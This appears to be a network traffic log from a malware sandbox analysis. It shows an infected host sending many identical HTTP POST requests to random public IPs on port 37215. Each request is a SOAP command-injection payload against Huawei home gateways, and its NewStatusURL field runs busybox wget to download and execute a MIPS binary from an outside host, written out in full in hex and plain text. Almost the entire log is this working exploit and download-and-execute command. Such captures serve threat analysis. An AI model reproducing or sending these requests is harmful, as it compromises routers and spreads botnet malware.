                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          63192.168.2.1560386157.29.221.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507879972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          64192.168.2.1535230162.95.184.25437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507900000 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          65192.168.2.1550594197.55.167.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507967949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          66192.168.2.1559188197.24.206.17337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507968903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          67192.168.2.1554474197.218.252.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507970095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          68192.168.2.154164241.252.242.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507970095 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          69192.168.2.155105096.243.225.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.507992983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          70192.168.2.1546638197.129.74.16237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508013010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          71192.168.2.1546694197.171.129.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508073092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          72192.168.2.153585614.86.207.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.508085012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 